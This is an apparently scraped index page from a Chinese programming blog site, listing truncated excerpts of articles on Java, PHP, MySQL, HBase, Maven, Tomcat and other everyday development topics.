  • java编程思想 -- 多态 百合不是茶 java多态详解
    一: 向上转型和向下转型 面向对象中的转型只会发生在有继承关系的子类和父类中(接口的实现也包括在这里)。父类:人    子类:男人向上转型: Person p = new Man() ; //向上转型不需要强制类型转化向下转型: Man man =
  • [自动数据处理]稳扎稳打,逐步形成自有ADP系统体系 comsci dp
          对于国内的IT行业来讲,虽然我们已经有了"两弹一星",在局部领域形成了自己独有的技术特征,并初步摆脱了国外的控制...但是前面的路还很长....       首先是我们的自动数据处理系统还无法处理很多高级工程...中等规模的拓扑分析系统也没有完成,更加复杂的
  • storm 自定义 日志文件 商人shang stormclusterlogback
    Storm中的日志级级别默认为INFO,并且,日志文件是根据worker号来进行区分的,这样,同一个log文件中的信息不一定是一个业务的,这样就会有以下两个需求出现: 1. 想要进行一些调试信息的输出 2. 调试信息或者业务日志信息想要输出到一些固定的文件中   不要怕,不要烦恼,其实Storm已经提供了这样的支持,可以通过自定义logback 下的 cluster.xml 来输
  • Extjs3 SpringMVC使用 @RequestBody 标签问题记录 21jhf
    springMVC使用 @RequestBody(required = false) UserVO userInfo 传递json对象数据,往往会出现http 415,400,500等错误,总结一下需要使用ajax提交json数据才行,ajax提交使用proxy,参数为jsonData,不能为params;另外,需要设置Content-type属性为json,代码如下: (由于使用了父类aaa
  • 一些排错方法 文强chu 方法
    1、java.lang.IllegalStateException: Class invariant violation at org.apache.log4j.LogManager.getLoggerRepository(LogManager.java:199)at org.apache.log4j.LogManager.getLogger(LogManager.java:228) at o
  • Swing中文件恢复我觉得很难 小桔子 swing
           我那个草了!老大怎么回事,怎么做项目评估的?只会说相信你可以做的,试一下,有的是时间!        用java开发一个图文处理工具,类似word,任意位置插入、拖动、删除图片以及文本等。文本框、流程图等,数据保存数据库,其余可保存pdf格式。ok,姐姐千辛万苦,
  • php 文件操作 aichenglong PHP读取文件写入文件
    1 写入文件 @$fp=fopen("$DOCUMENT_ROOT/order.txt", "ab"); if(!$fp){ echo "open file error" ; exit; } $outputstring="date:"." \t tire:".$tire."
  • MySQL的btree索引和hash索引的区别 AILIKES 数据结构mysql算法
    Hash 索引结构的特殊性,其 检索效率非常高,索引的检索可以一次定位,不像B-Tree 索引需要从根节点到枝节点,最后才能访问到页节点这样多次的IO访问,所以 Hash 索引的查询效率要远高于 B-Tree 索引。     可能很多人又有疑问了,既然 Hash 索引的效率要比 B-Tree 高很多,为什么大家不都用 Hash 索引而还要使用 B-Tree 索引呢
  • JAVA的抽象--- 接口 --实现 百合不是茶
    抽象 接口 实现接口   //抽象 类 ,方法   //定义一个公共抽象的类 ,并在类中定义一个抽象的方法体 抽象的定义使用abstract   abstract class A 定义一个抽象类 例如: //定义一个基类 public abstract class A{     //抽象类不能用来实例化,只能用来继承 //
  • JS变量作用域实例 bijian1013 作用域
    <script> var scope='hello'; function a(){ console.log(scope); //undefined var scope='world'; console.log(scope); //world console.log(b);
  • TDD实践(二) bijian1013 javaTDD
    实践题目:分解质因数 Step1: 单元测试: package com.bijian.study.factor.test; import java.util.Arrays; import junit.framework.Assert; import org.junit.Before; import org.junit.Test; import com.bijian.
  • [MongoDB学习笔记一]MongoDB主从复制 bit1129 mongodb
    MongoDB称为分布式数据库,主要原因是1.基于副本集的数据备份, 2.基于切片的数据扩容。副本集解决数据的读写性能问题,切片解决了MongoDB的数据扩容问题。   事实上,MongoDB提供了主从复制和副本复制两种备份方式,在MongoDB的主从复制和副本复制集群环境中,只有一台作为主服务器,另外一台或者多台服务器作为从服务器。 本文介绍MongoDB的主从复制模式,需要指明
  • 【HBase五】Java API操作HBase bit1129 hbase
    import java.io.IOException; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.hbase.HBaseConfiguration; import org.apache.hadoop.hbase.HColumnDescriptor; import org.apache.ha
  • python调用zabbix api接口实时展示数据 ronin47
    zabbix api接口来进行展示。经过思考之后,计划获取如下内容:     1、  获得认证密钥     2、  获取zabbix所有的主机组     3、  获取单个组下的所有主机     4、  获取某个主机下的所有监控项  
  • jsp取得绝对路径 byalias 绝对路径
    在JavaWeb开发中,常使用绝对路径的方式来引入JavaScript和CSS文件,这样可以避免因为目录变动导致引入文件找不到的情况,常用的做法如下: 一、使用${pageContext.request.contextPath}   代码” ${pageContext.request.contextPath}”的作用是取出部署的应用程序名,这样不管如何部署,所用路径都是正确的。
  • Java定时任务调度:用ExecutorService取代Timer bylijinnan java
    《Java并发编程实战》一书提到的用ExecutorService取代Java Timer有几个理由,我认为其中最重要的理由是: 如果TimerTask抛出未检查的异常,Timer将会产生无法预料的行为。Timer线程并不捕获异常,所以 TimerTask抛出的未检查的异常会终止timer线程。这种情况下,Timer也不会再重新恢复线程的执行了;它错误的认为整个Timer都被取消了。此时,已经被
  • SQL 优化原则 chicony sql
    一、问题的提出  在应用系统开发初期,由于开发数据库数据比较少,对于查询SQL语句,复杂视图的的编写等体会不出SQL语句各种写法的性能优劣,但是如果将应用系统提交实际应用后,随着数据库中数据的增加,系统的响应速度就成为目前系统需要解决的最主要的问题之一。系统优化中一个很重要的方面就是SQL语句的优化。对于海量数据,劣质SQL语句和优质SQL语句之间的速度差别可以达到上百倍,可见对于一个系统
  • java 线程弹球小游戏 CrazyMizzz java游戏
    最近java学到线程,于是做了一个线程弹球的小游戏,不过还没完善 这里是提纲 1.线程弹球游戏实现 1.实现界面需要使用哪些API类 JFrame JPanel JButton FlowLayout Graphics2D Thread Color ActionListener ActionEvent MouseListener Mouse
  • hadoop jps出现process information unavailable提示解决办法 daizj hadoopjps
    hadoop jps出现process information unavailable提示解决办法   jps时出现如下信息: 3019 -- process information unavailable3053 -- process information unavailable2985 -- process information unavailable2917 --
  • PHP图片水印缩放类实现 dcj3sjt126com PHP
    <?php class Image{ private $path; function __construct($path='./'){ $this->path=rtrim($path,'/').'/'; } //水印函数,参数:背景图,水印图,位置,前缀,TMD透明度 public function water($b,$l,$pos
  • IOS控件学习:UILabel常用属性与用法 dcj3sjt126com iosUILabel
    参考网站: http://shijue.me/show_text/521c396a8ddf876566000007 http://www.tuicool.com/articles/zquENb http://blog.csdn.net/a451493485/article/details/9454695 http://wiki.eoe.cn/page/iOS_pptl_artile_281
  • 完全手动建立maven骨架 eksliang javaeclipseWeb
    建一个 JAVA 项目 : mvn archetype:create -DgroupId=com.demo -DartifactId=App [-Dversion=0.0.1-SNAPSHOT] [-Dpackaging=jar] 建一个 web 项目 : mvn archetype:create -DgroupId=com.demo -DartifactId=web-a
  • 配置清单 gengzg 配置
    1、修改grub启动的内核版本 vi /boot/grub/grub.conf 将default 0改为1 拷贝mt7601Usta.ko到/lib文件夹 拷贝RT2870STA.dat到 /etc/Wireless/RT2870STA/文件夹 拷贝wifiscan到bin文件夹,chmod 775 /bin/wifiscan 拷贝wifiget.sh到bin文件夹,chm
  • Windows端口被占用处理方法 huqiji windows
    以下文章主要以80端口号为例,如果想知道其他的端口号也可以使用该方法..........................1、在windows下如何查看80端口占用情况?是被哪个进程占用?如何终止等.        这里主要是用到windows下的DOS工具,点击"开始"--"运行",输入&
  • 开源ckplayer 网页播放器, 跨平台(html5, mobile),flv, f4v, mp4, rtmp协议. webm, ogg, m3u8 ! 天梯梦 mobile
    CKplayer,其全称为超酷flv播放器,它是一款用于网页上播放视频的软件,支持的格式有:http协议上的flv,f4v,mp4格式,同时支持rtmp视频流格 式播放,此播放器的特点在于用户可以自己定义播放器的风格,诸如播放/暂停按钮,静音按钮,全屏按钮都是以外部图片接口形式调用,用户根据自己的需要制作 出播放器风格所需要使用的各个按钮图片然后替换掉原始风格里相应的图片就可以制作出自己的风格了,
  • 简单工厂设计模式 hm4123660 java工厂设计模式简单工厂模式
           简单工厂模式(Simple Factory Pattern)属于类的创新型模式,又叫静态工厂方法模式。是通过专门定义一个类来负责创建其他类的实例,被创建的实例通常都具有共同的父类。简单工厂模式是由一个工厂对象决定创建出哪一种产品类的实例。简单工厂模式是工厂模式家族中最简单实用的模式,可以理解为是不同工厂模式的一个特殊实现。
  • maven笔记 zhb8015 maven
    跳过测试阶段: mvn package -DskipTests 临时性跳过测试代码的编译: mvn package -Dmaven.test.skip=true   maven.test.skip同时控制maven-compiler-plugin和maven-surefire-plugin两个插件的行为,即跳过编译,又跳过测试。   指定测试类 mvn test
  • 非mapreduce生成Hfile,然后导入hbase当中 Stark_Summer maphbasereduceHfilepath实例
    最近一个群友的boss让研究hbase,让hbase的入库速度达到5w+/s,这可愁死了,4台个人电脑组成的集群,多线程入库调了好久,速度也才1w左右,都没有达到理想的那种速度,然后就想到了这种方式,但是网上多是用mapreduce来实现入库,而现在的需求是实时入库,不生成文件了,所以就只能自己用代码实现了,但是网上查了很多资料都没有查到,最后在一个网友的指引下,看了源码,最后找到了生成Hfile
  • jsp web tomcat 编码问题 王新春 tomcatjsppageEncode
    今天配置jsp项目在tomcat上,windows上正常,而linux上显示乱码,最后定位原因为tomcat 的server.xml 文件的配置,添加 URIEncoding 属性: <Connector port="8080" protocol="HTTP/1.1" connectionTi
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他